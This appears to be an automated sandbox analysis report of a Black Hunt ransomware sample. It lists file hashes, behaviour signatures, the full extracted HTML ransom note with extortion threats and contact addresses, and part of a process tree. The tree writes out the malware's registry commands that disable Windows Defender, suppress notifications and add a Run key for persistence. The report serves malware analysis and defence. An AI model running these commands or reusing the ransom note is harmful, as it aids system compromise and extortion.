Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    91s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/01/2024, 00:05

General

  • Target

    8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe

  • Size

    707KB

  • MD5

    7872e09ba0a15441604e90545b04aab7

  • SHA1

    c501ee9736dae19a046715f114e1ac7baf287f2f

  • SHA256

    8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f

  • SHA512

    4304de6648353dc7c4dc5a906e53e66d17018b69d6ffceb9718455288d71fb9237de6ca9755a41d892522f003c8751939c860cdfa54765915c765dd7492bb60a

  • SSDEEP

    6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I8Qvnh:6uaTmkZJ+naie5OTamgEoKxLW7Oh

Malware Config

Extracted

Path

C:\ProgramData\#BlackHunt_ReadMe.hta

Ransom Note
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="x-ua-compatible" content="ie=9"><meta charset="UTF-8"><HTA:APPLICATION icon="#" WINDOWSTATE="maximize" scroll="no" SELECTION="yes" contextmenu="no" caption="yes" SYSMENU="no" innerBorder="yes" SHOWINTASKBAR="yes" singleInstance="yes" /><meta name="viewport" content="width = device-width,initial-scale=1.0"><style>a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}</style><style>body,html{background-color:#dadada;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-weight:600;font-size:16px}a{text-decoration:none;color:#0483ab}div.header{margin-top:15px;margin-bottom:5px;width:100%}div.header h1{width:97%;text-align:left;font-size:30px;font-weight:900;margin:auto}div.header h1 span#black{display:inline-block;color:#000;margin-right:0;padding:2px 2px}div.header h1 span#hunter{display:inline-block;color:#e90303;background-color:#000;padding:2px 8px;margin-left:0}div.header h1 span#hunter span#version{font-size:12px}div.message div.head-encrypted-msg{width:100%}div.message div.head-encrypted-msg h1{font-size:330%;width:97%;margin:auto;text-align:center;font-weight:700}div.message div.head-encrypted-msg h1 span{display:inline-block;color:#000;background-color:#e90303;padding:0 8px 0 8px;margin-right:3px}div.message div.head-attention-msg{width:97%;margin:auto;text-align:center;margin-top:1%;border:1px solid #e90303;background-color:#f1caca;border-radius:5px;font-size:250%;padding-top:10px;padding-bottom:10px}div.message div.head-attention-msg p{margin-bottom:.5%}div.message div.head-attention-msg p span{color:#e90303}div.content{margin:auto;margin-top:2%}div.content div.content-head-msg{font-size:32px;text-align:left;font-weight:600}div.content div.content-boxes{margin:auto;margin-top:2%}div.content div.box{width:96%;margin:auto;border-radius:5px;margin-bottom:30px}div.content div.content-left-box{background-color:#c5cfd8;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #1878cf}div.content div.content-left-box h3.left-box-title{background-color:#1878cf;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-left-box div.content-contact-directly *{font-weight:600!important;line-height:1.4em}div.content div.content-left-box div.content-contact-directly h4{font-size:24px;font-weight:500;margin-top:8px}div.content div.content-left-box div.content-contact-directly h4#tox{font-weight:600;display:inline-block;margin-left:3px}div.content div.content-left-box div.content-contact-directly div.tox-id{margin-left:6%}div.content div.content-left-box div.content-contact-directly h4#tox-id{font-size:24px}div.content div.content-left-box div.content-contact-directly p#tox-id-p{font-size:16px}div.content div.content-left-box div.content-contact-directly h4#download-tox{display:inline-block;margin-left:6%}div.content div.content-left-box div.content-contact-directly p#download-tox-p{display:inline-block}div.content div.content-left-box div.content-contact-directly h4#email{display:inline-block;font-weight:600;margin-left:3px}div.content div.content-left-box div.content-contact-directly p#email-p{display:inline-block;font-size:24px;margin-left:8px}div.content div.content-left-box div.content-contact-directly h4#user-id{font-weight:500;margin-left:3px}div.content div.content-left-box div.content-contact-directly h4#user-id span{color:#e90303}div.content div.content-left-box div.content-contact-tor{margin-top:50px;font-weight:600!important}div.content div.content-left-box div.content-contact-tor h3{font-size:24px}div.content div.content-left-box div.content-contact-tor h3 span{color:#e90303}div.content div.content-left-box div.content-contact-tor div.content-tor-inside{margin-left:6;margin-top:10px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p{margin-top:8px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p img{position:relative;bottom:-3px}div.content div.content-right-box{background-color:#efb0b0;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #e90303}div.content div.content-right-box h3.right-box-title{background-color:#e90303;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-right-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p span{color:#e90303;font-weight:700;font-size:24px}</style><title>Black Hunt</title></head><body><div class="header"><h1><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIMAAAAWCAYAAADjNi+WAAAACXBIWXMAAC4jAAAuIwF4pT92AAALpWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNi4wLWMwMDIgNzkuMTY0NDYwLCAyMDIwLzA1LzEyLTE2OjA0OjE3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtbG5zOnRpZmY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vdGlmZi8xLjAvIiB4bWxuczpleGlmPSJodHRwOi8vbnMuYWRvYmUuY29tL2V4aWYvMS4wLyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIyLTEwLTEzVDEyOjMyOjAyKzAzOjMwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDIzLTA0LTA3VDA0OjIxOjI1KzA0OjMwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NGRiOTQ5OGItYTg5Mi0yMTRjLTliYzgtZTZlMDM3ZTYzYmJkIiB4bXBNTTpEb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6ZGVlODIyNjgtMDA3Ni0wNDQ2LWFjMGEtMzk2OTY3MzA0YTdjIiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQyMWY2MmY3ZWI1IiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBwaG90b3Nob3A6SUNDUHJvZmlsZT0ic1JHQiBJRUM2MTk2Ni0yLjEiIHRpZmY6T3JpZW50YXRpb249IjEiIHRpZmY6WFJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6WVJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6UmVzb2x1dGlvblVuaXQ9IjIiIGV4aWY6Q29sb3JTcGFjZT0iMSIgZXhpZjpQaXhlbFhEaW1lbnNpb249IjQ0OSIgZXhpZjpQaXhlbFlEaW1lbnNpb249Ijg5Ij4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY3JlYXRlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDoyNzIzMDY2Ny1kMzRkLWUyNGYtYmU1NS0wNDIxZjYyZjdlYjUiIHN0RXZ0OndoZW49IjIwMjItMTAtMTNUMTI6MzI6MDIrMDM6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6NzU5MzVkMTMtYjM0OS02ZTRiLWIwODctYzc5ZTJmZGNiNzgwIiBzdEV2dDp3aGVuPSIyMDIyLTEwLTEzVDEyOjMyOjE0KzAzOjMwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOmJiMmZiMmMyLWRjNDUtMzE0Yy1iMmQxLWRjNzFlZGUwNWJlYSIgc3RFdnQ6d2hlbj0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjIgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjb252ZXJ0ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImZyb20gYXBwbGljYXRpb24vdm5kLmFkb2JlLnBob3Rvc2hvcCB0byBpbWFnZS9wbmciLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImRlcml2ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImNvbnZlcnRlZCBmcm9tIGFwcGxpY2F0aW9uL3ZuZC5hZG9iZS5waG90b3Nob3AgdG8gaW1hZ2UvcG5nIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo0ZGI5NDk4Yi1hODkyLTIxNGMtOWJjOC1lNmUwMzdlNjNiYmQiIHN0RXZ0OndoZW49IjIwMjMtMDQtMDdUMDQ6MjE6MjUrMDQ6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6YmIyZmIyYzItZGM0NS0zMTRjLWIyZDEtZGM3MWVkZTA1YmVhIiBzdFJlZjpkb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6YTU3NzljMGQtYzI3Zi05ZjQ2LWJmMjgtYjQ2MzIzZjQ5ZjQxIiBzdFJlZjpvcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQy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 " alt=""></h1></div><div class="message"><div class="head-encrypted-msg"><h1>YOUR<span>WHOLE NETWORK</span>HAS BEEN PENETRATED BY<span>Black Hunt</span>!</h1></div><div class="head-attention-msg"><p>We also have uploaded your sensitive data, which we Will leak or sell in case of no cooperation!</p><p><span>Restore your data possible only buying private key from us</span></p></div></div><div class="content"><div class="content-boxes"><div class="content-right-box box"><h3 class="right-box-title">ATTENTION</h3><p>remember, there are many middle man services out there pretending that they can recover or decrypt your files , whom neither will contact us or scam you, Remember we are first and last solution for your files otherwise you will only waste money and time</p><p>trying to decrypt your files without our decryptor and through third party softwares will make your files completely useless, there is no third party decryptor since we are the only key holders</p><p>we have uploaded many critical data and information from your machines , we won't leak or sell any of them in Case of successful Corporation, however if we don't hear from you in 14 days we will either sell or leak your data in many forums</p><p></p><p>Remain all of your files untouched, do not change their name, extension and...</p></div><div class="content-left-box box"><h3 class="left-box-title">CONTACT US</h3><p>Your system is offline. in order to contact us you can email this address<span> [email protected] </span>this ID (<span> vesP9iTJOoX5XmBR </span>) for the title of your email.</p><p>If you weren't able to contact us whitin 24 hours please email:<span> [email protected] </span></p><p>Check your data situation in<a href="#"><span> http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion </span></a></p></div></div></div></body></html>
URLs

http-equiv="x-ua-compatible"

http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion

Signatures

  • Deletes NTFS Change Journal 2 TTPs 2 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  • Renames multiple (3388) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 27 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 9 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
    "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2568
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3876
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        3⤵
          PID:3280
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1556
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
          3⤵
          • Modifies registry class
          PID:2832
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5036
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
          3⤵
          • Modifies registry class
          PID:1268
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        2⤵
          PID:1648
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            3⤵
              PID:4340
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3292
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
              3⤵
              • Adds Run key to start application
              PID:2248
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:5064
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
              3⤵
                PID:4900
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3732
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1368
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2452
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                3⤵
                  PID:396
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2740
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                  3⤵
                    PID:3556
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1792
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                    3⤵
                      PID:3972
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4972
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                      3⤵
                        PID:1256
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2556
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                        3⤵
                          PID:4904
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2260
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                          3⤵
                            PID:3780
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                          2⤵
                            PID:3068
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                              3⤵
                                PID:1584
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                              2⤵
                                PID:2224
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                  3⤵
                                    PID:2192
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                  2⤵
                                    PID:2436
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                      3⤵
                                        PID:1936
                                    • C:\Windows\System32\cmd.exe
